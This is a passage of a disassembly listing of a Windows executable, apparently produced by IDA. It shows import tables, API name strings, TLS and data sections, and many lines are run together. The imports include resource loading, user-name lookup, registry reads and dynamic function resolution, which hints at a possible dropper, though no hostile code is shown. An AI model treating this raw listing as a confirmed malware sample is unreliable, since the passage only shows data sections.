dword_407688 dd 0 ; sub_4046C0+98�r
dword_40768C dd 0 ; sub_4046C0+184�r ...
dword_407690 dd 0 dword_407694 dd 0 ; sub_4046C0+201�r
dword_407698 dd 0 ; sub_4046C0+113�r
dword_40769C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary ; sub_4041C0+234�r ...
dword_4076A0 dd 0 ; sub_4046C0+285�r
dword_4076A4 dd 0 ; sub_4049CC�w
dword_4076A8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_4049DC+A6�r ...
dword_4076AC dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesAdword_4076B0 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA ; sub_404DD4+3D�r ...
dword_4076B4 dd 0 ; sub_404E50+16�r
dword_4076B8 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceA ; sub_4051C0+D�r
dword_4076BC dd 7C80BC69h ; resolved to->KERNEL32.SizeofResource ; sub_4051C0+1C�r
dword_4076C0 dd 7C809FB5h ; resolved to->KERNEL32.LoadResource ; sub_4051C0+2B�r
dword_4076C4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCount ; sub_4051C0+34�r
dword_4076C8 dd 7C8260C2h ; resolved to->KERNEL32.FreeResource ; sub_4051C0+41�r
dword_4076CC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; CODE:004052F4�r ...
dword_4076D0 dd 0 ; CODE:00405301�r
dword_4076D4 dd 0 ; CODE:0040536B�r ...
dword_4076D8 dd 0 ; CODE:00405376�o ...
dword_4076DC dd 41h dup(0) dword_4077E0 dd 0 ; CODE:0040532D�o ...
db 0
BSS ends
; Section 4. (virtual address 00008000)
; Virtual size : 000003F4 ( 1012.)
; Section size in file : 000003F4 ( 1012.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 408000h
dd 3 dup(0)
dd 8134h, 808Ch, 3 dup(0)
dd 82D2h, 80E8h, 3 dup(0)
dd 830Ah, 80F8h, 3 dup(0)
dd 834Ah, 8108h, 3 dup(0)
dd 8396h, 811Ch, 3 dup(0)
dd 83D4h, 812Ch, 5 dup(0)
dword_40808C dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_408090 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_408094 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_408098 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_40809C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_4080A0 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_4080A4 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_4054AB+36�r
dword_4080A8 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4080AC dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4080B0 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_4080B4 dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_4080B8 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4080BC dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4080C0 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_4080C4 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4080C8 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_4080CC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_4080D0 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_4080D4 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4080D8 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_4080DC dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_4080E0 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle align 8
dword_4080E8 dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_4080EC dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_4080F0 dd 7E42DF50h ; resolved to->USER32.CharNextA align 8
dword_4080F8 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_4080FC dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_408100 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 8
dword_408108 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_40810C dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_408110 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_408114 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA dd 0
dword_40811C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_408120 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_408124 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrary dd 0
dword_40812C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress dd 0
aKernel32_dll db 'kernel32.dll',0
align 4
aDeletecritical db 'DeleteCriticalSection',0
align 4
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aEntercriticals db 'EnterCriticalSection',0
align 4
aInitializecrit db 'InitializeCriticalSection',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 6F4C0000h, 466C6163h
dd 656572h, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetversion db 'GetVersion',0
align 4
dd 65470000h, 72754374h, 746E6572h, 65726854h, 64496461h
dd 0
aGetthreadlocal db 'GetThreadLocale',0
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 65470000h, 636F4C74h
dd 49656C61h, 416F666Eh, 0
aGetcommandline db 'GetCommandLineA',0
dd 72460000h, 694C6565h, 72617262h, 79h, 74697845h, 636F7250h
dd 737365h, 72570000h, 46657469h, 656C69h, 6E550000h, 646E6168h
dd 4564656Ch, 70656378h, 6E6F6974h, 746C6946h, 7265h, 74520000h
dd 776E556Ch, 646E69h, 61520000h, 45657369h, 70656378h
dd 6E6F6974h, 0
aGetstdhandle db 'GetStdHandle',0
align 2
aUser32_dll db 'user32.dll',0
align 10h
aGetkeyboardtyp db 'GetKeyboardType',0
dd 654D0000h, 67617373h, 786F4265h, 41h, 72616843h, 7478654Eh
dd 64610041h, 69706176h, 642E3233h, 6C6Ch, 65520000h, 65755167h
dd 61567972h, 4565756Ch, 4178h, 65520000h, 65704F67h, 79654B6Eh
dd 417845h, 65520000h, 6F6C4367h, 654B6573h, 656B0079h
dd 6C656E72h, 642E3233h, 6C6Ch, 6C540000h, 74655373h, 756C6156h
dd 65h, 47736C54h, 61567465h, 65756Ch, 6F4C0000h, 416C6163h
dd 636F6C6Ch, 0
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aKernel32_dll_0 db 'kernel32.dll',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 65470000h, 6F725074h
dd 64644163h, 73736572h, 0
aFreelibrary db 'FreeLibrary',0
aKernel32_dll_1 db 'kernel32.dll',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
_idata ends
; Section 5. (virtual address 00009000)
; Virtual size : 00000008 ( 8.)
; Section size in file : 00000008 ( 8.)
; Offset to raw data for section: 00009000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 409000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd 2 dup(0) ; DATA XREF: .rdata:TlsDirectory�o
_tls ends
; Section 6. (virtual address 0000A000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 0000A000
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40A000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd 409008h
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
_rdata ends
; Section 9. (virtual address 0003F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0003E600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 43F000h
align 2000h
_idata2 ends
end start